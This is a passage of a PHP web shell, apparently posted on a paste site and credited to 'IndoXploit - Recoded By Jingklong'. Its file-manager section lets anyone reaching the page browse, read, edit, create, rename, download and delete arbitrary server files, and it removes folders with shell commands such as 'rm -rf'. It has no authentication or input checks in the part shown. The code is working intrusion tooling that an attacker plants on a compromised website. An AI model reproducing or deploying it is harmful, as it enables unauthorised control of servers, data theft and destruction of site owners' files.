  815. $fopen = fopen($newfile, "a+");
  816. if($fopen) {
  817. $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  818. } else {
  819. $act = "<font color=red>permission denied</font>";
  820. }
  821. }
  822. echo $act;
  823. echo "<form method='post'>
  824. Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
  825. <input type='submit' name='new_save_file' value='Submit'>
  826. </form>";
  827. } elseif($_GET['act'] == 'newfolder') {
  828. if($_POST['new_save_folder']) {
  829. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  830. if(!mkdir($new_folder)) {
  831. $act = "<font color=red>permission denied</font>";
  832. } else {
  833. $act = "<script>window.location='?dir=".$dir."';</script>";
  834. }
  835. }
  836. echo $act;
  837. echo "<form method='post'>
  838. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  839. <input type='submit' name='new_save_folder' value='Submit'>
  840. </form>";
  841. } elseif($_GET['act'] == 'rename_dir') {
  842. if($_POST['dir_rename']) {
  843. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  844. if($dir_rename) {
  845. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  846. } else {
  847. $act = "<font color=red>permission denied</font>";
  848. }
  849. echo "".$act."<br>";
  850. }
  851. echo "<form method='post'>
  852. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  853. <input type='submit' name='dir_rename' value='rename'>
  854. </form>";
  855. } elseif($_GET['act'] == 'delete_dir') {
  856. if(is_dir($dir)) {
  857. if(is_writable($dir)) {
  858. @rmdir($dir);
  859. @exe("rm -rf $dir");
  860. @exe("rmdir /s /q $dir");
  861. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  862. } else {
  863. $act = "<font color=red>could not remove ".basename($dir)."</font>";
  864. }
  865. }
  866. echo $act;
  867. } elseif($_GET['act'] == 'view') {
  868. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  869. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  870. } elseif($_GET['act'] == 'edit') {
  871. if($_POST['save']) {
  872. $save = file_put_contents($_GET['file'], $_POST['src']);
  873. if($save) {
  874. $act = "<font color=lime>Saved!</font>";
  875. } else {
  876. $act = "<font color=red>permission denied</font>";
  877. }
  878. echo "".$act."<br>";
  879. }
  880. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  881. echo "<form method='post'>
  882. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  883. <input type='submit' value='Save' name='save' style='width: 500px;'>
  884. </form>";
  885. } elseif($_GET['act'] == 'rename') {
  886. if($_POST['do_rename']) {
  887. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  888. if($rename) {
  889. $act = "<script>window.location='?dir=".$dir."';</script>";
  890. } else {
  891. $act = "<font color=red>permission denied</font>";
  892. }
  893. echo "".$act."<br>";
  894. }
  895. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  896. echo "<form method='post'>
  897. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  898. <input type='submit' name='do_rename' value='rename'>
  899. </form>";
  900. } elseif($_GET['act'] == 'delete') {
  901. $delete = unlink($_GET['file']);
  902. if($delete) {
  903. $act = "<script>window.location='?dir=".$dir."';</script>";
  904. } else {
  905. $act = "<font color=red>permission denied</font>";
  906. }
  907. echo $act;
  908. } else {
  909. if(is_dir($dir) === true) {
  910. if(!is_readable($dir)) {
  911. echo "<font color=red>can't open directory. ( not readable )</font>";
  912. } else {
  913. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  914. <tr>
  915. <th class="th_home"><center>Name</center></th>
  916. <th class="th_home"><center>Type</center></th>
  917. <th class="th_home"><center>Size</center></th>
  918. <th class="th_home"><center>Last Modified</center></th>
  919. <th class="th_home"><center>Owner/Group</center></th>
  920. <th class="th_home"><center>Permission</center></th>
  921. <th class="th_home"><center>Action</center></th>
  922. </tr>';
  923. $scandir = scandir($dir);
  924. foreach($scandir as $dirx) {
  925. $dtype = filetype("$dir/$dirx");
  926. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  927. if(function_exists('posix_getpwuid')) {
  928. $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
  929. $downer = $downer['name'];
  930. } else {
  931. //$downer = $uid;
  932. $downer = fileowner("$dir/$dirx");
  933. }
  934. if(function_exists('posix_getgrgid')) {
  935. $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
  936. $dgrp = $dgrp['name'];
  937. } else {
  938. $dgrp = filegroup("$dir/$dirx");
  939. }
  940. if(!is_dir("$dir/$dirx")) continue;
  941. if($dirx === '..') {
  942. $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  943. } elseif($dirx === '.') {
  944. $href = "<a href='?dir=$dir'>$dirx</a>";
  945. } else {
  946. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  947. }
  948. if($dirx === '.' || $dirx === '..') {
  949. $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
  950. } else {
  951. $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  952. }
  953. echo "<tr>";
  954. echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
  955. echo "<td class='td_home'><center>$dtype</center></td>";
  956. echo "<td class='td_home'><center>-</center></th></td>";
  957. echo "<td class='td_home'><center>$dtime</center></td>";
  958. echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
  959. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  960. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  961. echo "</tr>";
  962. }
  963. }
  964. } else {
  965. echo "<font color=red>can't open directory.</font>";
  966. }
  967. foreach($scandir as $file) {
  968. $ftype = filetype("$dir/$file");
  969. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  970. $size = filesize("$dir/$file")/1024;
  971. $size = round($size,3);
  972. if(function_exists('posix_getpwuid')) {
  973. $fowner = @posix_getpwuid(fileowner("$dir/$file"));
  974. $fowner = $fowner['name'];
  975. } else {
  976. //$downer = $uid;
  977. $fowner = fileowner("$dir/$file");
  978. }
  979. if(function_exists('posix_getgrgid')) {
  980. $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
  981. $fgrp = $fgrp['name'];
  982. } else {
  983. $fgrp = filegroup("$dir/$file");
  984. }
  985. if($size > 1024) {
  986. $size = round($size/1024,2). 'MB';
  987. } else {
  988. $size = $size. 'KB';
  989. }
  990. if(!is_file("$dir/$file")) continue;
  991. echo "<tr>";
  992. echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  993. echo "<td class='td_home'><center>$ftype</center></td>";
  994. echo "<td class='td_home'><center>$size</center></td>";
  995. echo "<td class='td_home'><center>$ftime</center></td>";
  996. echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
  997. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  998. echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  999. echo "</tr>";
  1000. }
  1001. echo "</table>";
  1002. if(!is_readable($dir)) {
  1003. //
  1004. } else {
  1005. echo "<hr>";
  1006. }
  1007. echo "<center>Copyright &copy; ".date("Y")." - <font color=lime>IndoXploit - Recoded By Jingklong</font></center>";
  1008. }
  1009. ?>
  1010. </html>
Add Comment
Please, Sign In to add comment